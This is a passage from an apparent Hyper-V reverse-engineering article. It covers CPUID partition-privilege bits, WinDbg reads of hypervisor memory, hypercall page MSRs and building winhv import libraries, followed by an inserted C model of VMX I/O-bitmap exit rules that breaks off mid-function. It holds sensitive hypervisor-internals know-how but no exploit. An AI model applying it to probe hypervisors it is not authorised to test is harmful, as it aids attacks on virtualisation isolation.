normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> result).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">CPUID 40000003 called</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EAX =00002E7F (101110 01111111) - corresponds to bits 31-0 of HV_PARTITION_PRIVILEGE_MASK</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EBX =003B8030 (111011 10000000 00110000) - corresponds to bits 63-32 of HV_PARTITION_PRIVILEGE_MASK</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ECX =00000002 (10) - Reserved</span></p><p dir="ltr" 
style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EDX =00BED7B2 (10111110 11010111 10110010)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 1:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest debugging support is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for passing hypercall input parameter block via XMM registers is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for a virtual guest idle state is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 7:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; 
vertical-align: baseline;">Support for querying NUMA distances is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 8:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for determining timer frequencies is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 9:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for injecting synthetic machine checks is available.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; 
margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 10:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for guest crash MSRs is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 12:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for NPIEP is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; 
font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 14:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ExtendedGvaRangesForFlushVirtualAddressListAvailable</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 15:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for returning hypercall output via XMM registers is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 17:</span><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SintPollingModeAvailable</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 18:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">HypercallMsrLockAvailable</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 19:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span 
class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Use direct synthetic timers</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 20:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for PAT register available for VSM</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 21:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 
font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for bndcfgs register available for VSM</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 23:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for synthetic time unhalted timer available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Inside the hypervisor, the privileges of the partition whose operation caused the VM exit can be obtained starting from gs:0. First read the hypervisor's GS base, either from the VMCS field HOST_GS_BASE or from the IA32_GS_BASE MSR:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; 
margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>rdmsr 0xc0000101</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">msr[c0000101] = fffffbdb`a68c2000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then take the pointer stored at gs:83a8 and read the memory at offset 0xd8 from it:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc poi(fffffbdb`a68c2000+0x83a8)+d8</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe800`000010d8 00003fff 002bb9ff 00000000 ffffe800 .?....+.........</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe800`000010e8 00000000 00000000 00216560 ffffe800 ........`e!.....</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe800`000010f8 00000001 00000000 00000000 00000000 ................</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe800`00001108 002342c0 ffffe800 00000000 00000000 .B#.............</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this case the VM exit came from the 
root-partition: the first two dwords, 00003fff and 002bb9ff, make up the value 002BB9FF00003FFF quoted above for the root partition.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In each partition the hypervisor sets up a special page for issuing hypercalls. Its address can be obtained by reading MSR 0x40000001 (HV_X64_MSR_HYPERCALL):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 306px; overflow: hidden; width: 355px;"><img height="306" src="https://lh6.googleusercontent.com/dRfWUivA_du6El3no3uCzeCOJzjaBjngkeHihtuEm-55_wZ2PHElqNIvcp3bNOTo4sBJROWfe8gr1qNO7Pr948Op7mVZrTs6wC0XANv74pIo9UBrIiWZjxwlLDsUP-ViyL3Bp4ZjwUemdCWfIA" style="margin-left: 0px; margin-top: 0px;" width="355" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="783" src="https://lh4.googleusercontent.com/Vx8peNKv-PjP_YfuzljoM9UEMf7svUp69z4uohN9FvA88rZYYf5Pia-QkQDd_mhtw39uV4di75O7AsN7fwJ7qpfwXVxbiEgHai1_HIMYxjEqA1Ns-yVYU4NtEVsMyzuK7VNevAXEMOBwXKvOsA" style="margin-left: 0px; margin-top: 0px;" width="671" 
/></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To use the functions exported by winhv.sys\winhvr.sys, you can either resolve their addresses dynamically or create a lib-file. Consider the second option.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Create a def-file from the output of dumpbin:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">dumpbin /exports winhv.sys</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(Windows Server 2016 and 
newer use the winhvr.sys driver in the root partition, so the def-file must be generated for that driver.)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To build a 64-bit driver you do not need to make any changes.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After editing the def-file, regenerate the lib-file with the following command (for x86):</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lib.exe /def:winhv.def /OUT:winhv.lib /machine:x86 </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For x64:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: 
normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lib.exe /def:winhvr.def /OUT:winhvr.lib /machine:x64</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Run Visual studio native tools command prompt before execute this.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can find hypercall table in hvix64.exe using script </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-scripts/blob/master/CreatemVmcallHandlersTable2019.py" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-scripts/blob/master/CreatemVmcallHandlersTable2019.py</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Script creates table like that:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 71.4pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 258px; overflow: hidden; width: 565px;"><img height="258" src="https://lh3.googleusercontent.com/y3rvD_X4KrHv9DTW4i8v-deS7v5q61O6z3QTcN1OCCMvJuCoNupV1oz_fhceG_kSkyBfwQScFHOMFL9_S1QVsaumcIiW6o9VQCkF86jRYOfx6jAKTqEEGWJKkeT5ppRz_Zis89goRXh5rsqvig" style="margin-left: 0px; margin-top: 0px;" width="565" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can display VMCS fields inside hvix64.exe, using script. 
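Added example (this is not code from the original article or from display-vmcs.py): a small C model of how the CPU applies two of the primary processor-based VM-execution controls that the script prints, "Unconditional I/O exiting" (bit 24) and "Use I/O bitmaps" (bit 25), together with the two 4 KiB I/O bitmaps referenced by the VMCS. The bit positions, the rule that the bitmaps override the unconditional control, and the rule that a multi-byte access exits if any byte it touches is trapped are taken from the Intel SDM; the two sample policies and the trapped ports (0xCF8/0xCFC and 0x8000) are constructed for this example and are not taken from a real Hyper-V VMCS.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Primary processor-based VM-execution controls (VMCS field 0x4002), Intel SDM Table 24-6. */
#define CPU_BASED_UNCOND_IO_EXITING (1u << 24)
#define CPU_BASED_USE_IO_BITMAPS    (1u << 25)

/* I/O bitmap A covers ports 0x0000-0x7FFF, bitmap B covers 0x8000-0xFFFF; one 4 KiB page each
   (their guest-physical addresses live in VMCS fields 0x2000 and 0x2002). */
#define IO_BITMAP_BYTES 4096

typedef struct {
    uint32_t proc_ctls;
    uint8_t  bitmap_a[IO_BITMAP_BYTES];
    uint8_t  bitmap_b[IO_BITMAP_BYTES];
} io_exit_policy;

void policy_init(io_exit_policy *p, uint32_t proc_ctls)
{
    memset(p, 0, sizeof *p);
    p->proc_ctls = proc_ctls;
}

/* Set the bit for one port: bit set == IN/OUT on that port causes a VM exit. */
void io_bitmap_trap_port(io_exit_policy *p, uint16_t port)
{
    uint8_t *bm = (port < 0x8000) ? p->bitmap_a : p->bitmap_b;
    uint16_t idx = port & 0x7FFF;
    bm[idx / 8] |= (uint8_t)(1u << (idx % 8));
}

/* Returns 1 if an IN/OUT of `size` bytes starting at `port` causes a VM exit. */
int io_access_causes_vmexit(const io_exit_policy *p, uint16_t port, unsigned size)
{
    if (p->proc_ctls & CPU_BASED_USE_IO_BITMAPS) {
        /* Bitmaps in use: the CPU ignores "unconditional I/O exiting" and exits
           if the bit of ANY byte the access touches is set (SDM 25.1.3). */
        for (unsigned i = 0; i < size; i++) {
            uint16_t q = (uint16_t)(port + i);           /* 16-bit port space wraps */
            const uint8_t *bm = (q < 0x8000) ? p->bitmap_a : p->bitmap_b;
            uint16_t idx = q & 0x7FFF;
            if (bm[idx / 8] & (1u << (idx % 8)))
                return 1;
        }
        return 0;
    }
    return (p->proc_ctls & CPU_BASED_UNCOND_IO_EXITING) ? 1 : 0;
}

/* Constructed sample policies (not dumped from a real VMCS). */
static io_exit_policy g_guest, g_root;

/* Guest-partition style: unconditional exiting, bitmaps not used. */
int guest_port_exits(uint16_t port, unsigned size)
{
    policy_init(&g_guest, CPU_BASED_UNCOND_IO_EXITING);
    return io_access_causes_vmexit(&g_guest, port, size);
}

/* Root-partition style: bitmaps enabled, only a few ports trapped
   (0xCF8/0xCFC, the PCI configuration ports, chosen here as an illustration). */
int root_port_exits(uint16_t port, unsigned size)
{
    policy_init(&g_root, CPU_BASED_USE_IO_BITMAPS | CPU_BASED_UNCOND_IO_EXITING);
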